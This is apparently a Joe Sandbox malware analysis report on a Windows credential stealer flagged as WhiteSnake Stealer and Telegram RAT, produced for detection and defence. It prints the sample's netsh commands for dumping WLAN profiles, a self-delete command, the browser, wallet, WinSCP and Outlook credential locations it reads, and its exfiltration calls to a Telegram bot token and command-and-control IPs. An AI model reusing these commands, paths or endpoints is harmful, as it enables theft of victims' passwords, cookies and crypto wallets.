Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: build.exe, 00000002.00000002.2295304015.0000026B66887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\AppData\Local\Temp\build.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\build.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: build.exe.0.dr, vmG.cs	Reference to suspicious API methods: GetProcAddress(a4, rU)
Source: build.exe.0.dr, nf.cs	Reference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, aiGT.Id)
Source: build.exe.0.dr, nf.cs	Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Uses netsh to modify the Windows network and firewall settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match	File source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build.exe, 00000002.00000002.2295681999.0000026B66EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets
Source: build.exe, 00000002.00000002.2295681999.0000026B670AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus
Source: build.exe, 00000002.00000002.2295681999.0000026B66ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
Source: build.exe, 00000002.00000002.2295681999.0000026B66E78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\build.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\build.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match	File source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	3 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Software Packing	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	4 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles
file.exe	100%	Avira	HEUR/AGEN.1307423
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\build.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.w3.or	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		unknown
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==	true	unknown
http://ip-api.com/line?fields=query,country	false	unknown
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://209.38.221.184:80802	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.217.98.121:80	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://138.2.92.67:443	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org	build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.telegram.org/bot	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://209.38.221.184:8080/%79%4C%57%46%64%5F%66%72%6F%6E%74%64%65%73%6B%40%39%32%37%35%33%37%5F%72%	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://209.38.221.184:8080/yLWFd_user	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://167.235.70.96:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://20.78.55.47:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://107.161.20.142:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://5.196.181.135:443	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://101.43.160.136:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://41.216.183.9:8080/sendData	build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://192.99.196.191:443	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://168.138.211.88:8099	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://18.228.80.130:80	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://209.38.221.184:8080/I85OAzj7Op/yLWFd_user	build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D81000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://209.38.221.184:8080/yLWFd_user%40927537_report.wsr	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://185.217.98.121:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://8.219.110.16:9999	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://209.38.221.184	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://8.216.92.21:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://65.49.205.24:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://47.96.78.224:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://129.151.109.160:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://147.28.185.29:80	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://154.9.207.142:443	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://41.216.183.9:80802	build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://209.38.221.184:8080	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://209.38.221.184:8080/get	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.w3.or	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://206.166.251.4:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user	build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://194.164.198.113:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://38.207.174.88:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ip-api.com/line?fields=query	build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:18772/handleOpenWSR?r=http://209.38.221.184:8080/get/I85OAzj7Op/yLWFd_user	build.exe, 00000002.00000002.2295681999.0000026B66DAD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://159.203.174.113:8090	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://101.126.19.171:80	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un	build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://185.217.98.121:443	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://46.235.26.83:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://116.202.101.219:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://38.60.191.38:80	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://67.230.176.97:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://132.145.17.167:9090	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.tele	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://schemas.xmlsoap.org/wsdl/	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://127.0.0.1:18772/handleOpenWSR?r=	build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.159.4.50:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://8.222.143.111:8080	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://41.216.183.9:8080	build.exe, 00000002.00000002.2295681999.0000026B66CE0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org	build.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://41.87.207.180:9090	build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.telegram.org	build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
209.38.221.184	unknown	United States	7018	ATT-INTERNET4US	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
41.216.183.9	unknown	South Africa	40676	AS40676US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545189
Start date and time:	2024-10-30 08:10:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/5@2/4
